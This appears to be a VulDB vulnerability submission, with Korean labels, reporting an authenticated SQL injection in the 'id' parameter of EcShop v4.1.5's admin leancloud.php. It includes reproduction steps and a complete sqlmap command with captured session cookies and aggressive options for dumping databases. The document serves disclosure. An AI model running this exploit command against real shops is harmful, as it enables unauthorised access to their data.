| 제목 | EcShop v4.1.5 SQL injection |
|---|
| 설명 | A vulnerability was discovered in Ecshop v4.1.5. After logging in to the system, the parameter id exists in leancloud.php, and the parameter id is not filtered normally, resulting in SQL injection. An attacker can exploit this vulnerability to obtain data.
1、First log in to the backend, then visit the page below and use burp to capture the packet and obtain the corresponding cookie.
/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123
Note: The cookie must be the following key-value pair. If one item is missing, it means that the correct package is not captured or it must be reconfigured.
2、Use sqlmap for injection testing, pay attention to replace the number in --cookie with the actual cookie, and finally obtain the data successfully.
sqlmap -u "http://172.16.214.182/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123" --data "act=resend" -p "id" --skip "act,cookie,user-agent,referer,host" --risk 3 --level 5 --dbms mysql --cookie "loginNum=1; ECS_LastCheckOrder=Thu%2C%2028%20Apr%202022%2013%3A16%3A49%20GMT; PHPSESSID=ebtmgof8q3bto0ai088fsvl4bh; ECS_ID=18d636b4644873c4fdb46cf3c4c2b135a912706e; ECS[visit_times]=1; ECSCP_ID=378bf619d7c9c9df588c937be89e20acd56e0821; Hm_lvt_154183a478f900f0163b2141ac4416a5=1651151808; Hm_lpvt_154183a478f900f0163b2141ac4416a5=1651151808" --dbs --flush-session --batch --random-agent |
|---|
| 원천 | ⚠️ https://github.com/xhcccan/code/issues/1 |
|---|
| 사용자 | xhccan (UID 52599) |
|---|
| 제출 | 2023. 09. 24. PM 12:14 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 09. 29. PM 04:19 (5 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 240924 [ECshop 4.1.5 /admin/leancloud.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|